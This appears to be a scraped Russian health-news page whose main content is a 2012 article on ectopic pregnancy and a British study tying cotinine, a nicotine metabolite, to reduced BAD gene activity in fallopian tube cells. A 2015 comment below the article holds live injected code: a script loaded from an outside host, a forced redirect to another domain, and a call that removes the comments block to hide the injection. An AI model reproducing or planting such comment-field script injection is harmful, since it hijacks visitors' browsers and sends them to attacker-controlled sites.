Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Никотин и внематочная бер...  >>  Никотин и внематочная беременность
 
Обратная связь
 

Никотин и внематочная беременность

Размер шрифта
20 августа 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Один из механизмов формирования внематочной беременности раскрыт. Британские ученые установили, почему курение приводит к внематочной беременности.

Что такое внематочная беременность

Внематочная беременность развивается в том случае, когда прикрепление оплодотворенной яйцеклетки происходит не в полости матки, а за ее пределами. В зависимости от расположения плодного яйца выделяют трубную (98% случаев), яичниковую и брюшную беременность. Внематочная беременность нежизнеспособна и опасна для здоровья женщины в связи с риском развития кровотечения. При отсутствии лечения внематочная беременность может привести к летальному исходу.

Механизм развития

В норме оплодотворение яйцеклетки происходит в маточной трубе, откуда оплодотворенная яйцеклетка поступает в полость матки. При внематочной беременности плодное яйцо не попадает в полость матки и прикрепляется к маточной трубе или выталкивается из трубы в обратном направлении и прикрепляется к яичнику или окружающей брюшине. Поскольку вне матки нет нормальных условий для развития эмбриона, ворсины хориона внедряются в ткань органа и повреждают ее, вызывая кровотечение в брюшную полость.

Симптомы

На ранних стадиях внематочная беременность по течению не отличается от маточной. Неблагоприятные симптомы обычно появляются в срок от 5 до 8 недель со дня последней менструации. К ним относятся:

  • Боль, которая бывает ноющей, режущей или схваткообразной; возникает внизу живота с одной стороны, может отдавать в прямую кишку.
  • Кровотечение в брюшную полость и маточное кровотечение. Кровотечение в брюшную полость связано с повреждением сосудов, а маточное кровотечение – с падением уровня прогестерона. Маточное кровотечение может напоминать менструацию, но в большинстве случаев кровянистые выделения бывают скудными и продолжаются длительно.

Суть исследования

С целью изучения влияния курения на развитие внематочной беременности ученые использовали клетки маточной трубы, которые подвергались воздействию продукта распада никотина – котинина. Оказалось, что котинин оказывает негативное влияние на гены, отвечающие за гибель клеток, в частности на ген BAD. У курящих женщин активность гена BAD в клетках маточных труб снижена.

Следует отметить, что в норме перед прикреплением плодного яйца в клетках слизистой оболочки матки происходит снижение активности гена BAD. Таким образом, снижение активности гена в маточных трубах создает предпосылки для прикрепления плодного яйца не в полости матки, а в маточных трубах.

Ученые надеются, что полученные результаты позволят разработать меры предупреждения развития внематочной беременности, а также улучшить ее диагностику и лечение.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Мама может спасти своего ребенка от стресса   Какие механизмы помогают выносить беременность?   Пассивное курение делает детей умственно отсталыми   Более миллиона беременных женщин заражены сифилисом! Вы можете быть среди них!  
08 февраля 2013Ожирение можно предсказать сразу после рождения 07 декабря 2012Жизнь наследника британской короны под угрозой
 
25 июля 2012Скоро мы сможем восстанавливаться после травм как ящерицы! 24 июля 2012Организм матери считает плод чужеродным элементом!
 

Слайдшоу

1
Вся правда о месячных и беременности
11 способов узнать, что ты беременна
Что мешает вам забеременеть

Тесты

1
Что есть будущим мамам?
Что вы знаете об СДВГ?
Сколько вы проживете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.